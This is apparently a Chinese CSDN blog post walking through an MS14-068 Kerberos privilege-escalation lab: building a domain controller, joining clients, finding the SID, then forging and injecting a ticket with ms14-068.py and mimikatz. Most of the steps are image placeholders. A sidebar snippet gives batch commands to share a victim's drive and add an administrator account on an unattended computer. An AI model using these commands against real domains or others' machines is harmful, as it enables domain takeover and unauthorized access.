MS14-068漏洞提权学习(实战)&& 域控服务器搭建 && 远程权限提升 && 查看域控中的sid

最新推荐文章于 2024-06-21 02:25:46 发布
最新推荐文章于 2024-06-21 02:25:46 发布
阅读量431 收藏
点赞数
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/108300346
版权

MS14-068漏洞提权学习(实战)&& 域控服务器搭建 && 远程权限提升 && 查看域控中的sid

文章目录

前言

在这里插入图片描述
在这里插入图片描述

一、MS14-068漏洞提权学习

在这里插入图片描述
在这里插入图片描述
安装dcpromo

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安装完成!!!

二、MS14-068漏洞提权实战

在win7中设置死ip
在这里插入图片描述
将win7DNS服务器解析到2003中

在这里插入图片描述
安装 windows XP Professional

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安装完成!!!

三、域控服务器搭建

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
也可以在这里新建用户
在这里插入图片描述
以域的形式进行登录:
在这里插入图片描述
然后去kali查看漏洞利用代码:
在这里插入图片描述

四、远程权限提升

装好python 2.7.17
在这里插入图片描述
在这里插入图片描述
Ip配置要求:
在这里插入图片描述
相关域命令:
python.exe ms14-068.py -u aa@admin.com -s userSID -d admin.com
mimikatz.exe “kerberos::ptc TGT_user-a-1@dom-a.loc.ccache” exit3

五、查看域控中的sid

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

六、我的公众号

后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

永不垂头
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ETL工具-Nifi MS SQL订单Header&Detail数据同步/迁移解决方案
05-20
ETL工具-Nifi MS SQL订单Header&Detail数据同步/迁移解决方案,主从表同步
第60天:权限提升-MY&MS&ORA等SQL数据库提权1
08-03
在网络安全和渗透测试权限提升是一个关键环节,尤其是在无法利用系统级溢出漏洞时,数据库提权成为了攻击者常用的技术。本篇文章将详细讲解如何针对MY&MS&ORA等SQL数据库进行提权,以及涉及的相关知识点。 首先...
红队笔记7--Web机器为Linux&&docker逃逸
huohaowen的博客
03-12 1211
对于这一次的vulstack靶场环境,还是比较真实的还原了企业内部的环境的(就web机器来说)其遇到的问题也是比较贴切生活的,像用的Linux服务器,cs存在对应的限制,msf上线不成功,proxychains的摇曳等等等等,都是现实生活会遇到的众多的问题,总之还是那句话学海无涯,学无止境,cease to live ,cease to struggle!!!
红日靶场-ATT&CK实战系列-红队评估(一)
最新发布
m0_66638011的博客
06-21 906
红日靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。红日靶机主要以内网渗透学习为主。红日靶场的网络结构复杂多样,包括外网、内网、DMZ区域等。不同的网络区域之间通过防火墙、路由器等设备进行隔离和访问控制。靶场网络结构还包括了各种服务器和网络设备,如Web服务器、数据库服务器、文件服务器等。
红日安全vulnstack-ATT&CK实战系列 红队实战(四)
遇事不决冲冲冲
03-29 8441
一.介绍 下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ st漏洞利用phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、 域渗透 机器密码 web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 二.环境搭建 下载完成后为三个压缩包,解压后如图 在每个文件夹创建
ATT&CK红队评估实战靶场(一)靶场搭建和模拟攻击过程全过程
weixin_44286136的博客
09-30 2870
ATT&CK红队评估实战靶场(一) 0x01 前言 本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019 0x02 环境搭建 WEB服务器:windows7系统 外网网卡IP:192.168.31.59 内网网卡IP:192.168.52.143
ATT&CK 实战 - 红日安全 vulnstack (一)
洛柒尘的博客
08-20 4569
前言 1 | 环境搭建 | 1.0 | 靶场介绍 | ATT&CK实战系列—红队实战(一)是红日安全团队出品的一个实战环境,该靶场模拟真实环境。 1.0.0 | 靶场信息 | 靶场名: vulnstack 1 下载链接: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶机数量: 3 1.0.1 | 虚拟机配置 | 所有主机密码为:hongrisec@2019 密码同一修改为:hongrisec@2021 攻击机 名称
ATT&CK 红队实战 2
m0_64118193的博客
11-03 799
难度:等 每台主机上运行着360,同时打开防火墙。(模拟外网连接)配置 192.168.111.0。WEB 网络适配器1。WEB 网络适配器 2。PC 网络适配器1。PC 网络适配器 2。下载web扫描漏洞工具。
小迪渗透&权限提升(捌)
weixin_41665162的博客
09-03 1149
文章目录58. 网站权限后台漏洞第三方获取(58-64)具体有哪些权限需要我们知道和了解掌握的?演示案例: 58. 网站权限后台漏洞第三方获取(58-64) 当前知识点在渗透流程的点 前面-期-后期对应知识关系 当前知识点在权限提升的重点 知识点顺序,理解思路,分类介绍等 当前知识点权限提升权限介绍 注重理解当前权限对应可操作的事情 利用成功后的思想需要总结的思路 相关的操作被拒绝无法实现的时候就会涉及到权限提升 具体有哪些权限需要我们知道和了解掌握的? 后台权限,网站权限,数据库权限,接口权限,系
ATT&CK实战系列—红队实战-4
Beret-81的博客
04-27 1468
0、靶场介绍 靶场下载、配置参考:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 靶场配置后需要自行开启 vulhub 里面的三个漏洞。 1、信息收集 2、漏洞分析 该阶段为漏洞挖掘、漏洞扫描、漏洞验证 2.1 struts2 漏洞 struts2 漏洞检查工具: https://github.com/HatBoy/Struts2-Scan https://github.com/shack2/Struts2VulsTools https://git
ATT&CK实战系列—红队实战-3
Beret-81的博客
04-27 1490
ATT&CK实战系列—红队实战-30、靶场介绍1、信息收集2、漏洞分析2.1 漏洞挖掘2.2 漏洞扫描2.3 漏洞验证3、漏洞利用​3.1 Joomala Getshell3.2 主机信息收集3.3 敏感信息收集4、权限提升4.1 脏牛提权5、权限维持5.1 添加 root 后门6、横向渗透6.1 搭建 socks5 代理6.2 内网主机探测6.3 端口探测6.4 漏洞扫描6.5 域内横向--域成员6.6 域内横向--域控6.7 拿到 FLAG7、痕迹清理7.1 Linux7.2 windows 0
ms14-068.exe域内神器
11-25
【标题】"ms14-068.exe域内神器" 涉及的主要知识点是Microsoft在2014年发布的安全更新公告MS14-068,它与Windows操作系统的Kerberos认证漏洞有关。这个漏洞允许攻击者通过精心构造的请求,绕过域控制器的安全验证...
Kinect v2 Examples with MS-SDK 2.21.unitypackage && KinectV2-Sam
11-09
《Kinect v2在Unity的应用探索:MS-SDK 2.21与Sample解析》 Kinect v2是一款由微软公司推出的高级体感设备,它在第一代的基础上增加了更高的精度和更多的传感器,使得开发者能够更深入地捕捉和理解用户的行为。本...
pykek-ms14-068.zip
01-06
标签“pykek-ms14-068.z”进一步强化了这个主题,暗示了内容与pykek工具和MS14-068漏洞有关。然而,标签的".z"可能是一个错误,因为通常的文件扩展名是".zip",这可能是压缩文件的一部分。 在压缩包内的文件...
简单入侵操作
永不垂头的博客
06-30 9729
学习笔记—简单入侵操作 趁别人不在的时间操作他人电脑 打开cmd 输入:net share c$=c:\(将他的磁盘共享出去,同时也要打开电脑上的允许远程操控权限) 然后ipconfig下,记录他的ip 写好.bat脚本。 net user admin 123456 /add net localgroup administrators admin /add shutdown -s -t 60 -c “这个年纪你睡得着觉?” 从本机cmd上输入net use k: \192.168.1.103\c$
解决kali不显示网卡
永不垂头的博客
07-10 7684
学习笔记—解决kali不显示网卡 状况图 首先在本机检查vm服务是否开启 服务开启后进入vi /etc/network/interfaces 编辑,添加 auto eth0 iface eth0 inet dhcp wq保存退出 /etc/init.d/networking restart 重启网卡恢复正常 了解更多请关注下列公众号: 了解更多请关注下列公众号: ...
资产收集的方法总结
永不垂头的博客
02-01 6084
资产收集的方法总结 文章目录资产收集的方法总结前言一、资产收集基本名词概念二、相关收集方法1.fofa2.google搜索语法3.logo4.favicon.ico5.关键字6.维基百科7.天眼查,企查查8. 微信公众号9. APP10.在线接口查询三、我的公众号 前言 很多人以为资产收集就是信息收集,刚开始我也是这样认为的,其实信息收集包含资产收集但不限于资产收集,信息收集包含whois,真实IP,网站架构,子域名收集,敏感目录,DNS信息,旁站,C段,端口等;而资产收集主要收集IP和域名,找到属于目标的
Dvwa csrf之low、medium、high级别漏洞实战
永不垂头的博客
08-11 5082
Dvwa csrf低高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域可用的全部变量。GLOBALS :引用全局作用域可用的全部变量。GLOBALS:引用全局作用域可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本的任意位置访问全局变量(从函数或方法均可)。PHP 在名为 $GLOBALS[index] 的数组存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
ms14-068漏洞实验
06-01
ms14-068 漏洞实验是一个模拟漏洞攻击的实验,旨在帮助安全研究人员、渗透测试人员和网络管理员更好地了解和防范该漏洞。该漏洞最初被发现于2014年,影响到了微软的 Windows 域控制器。攻击者可以利用该漏洞提升其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值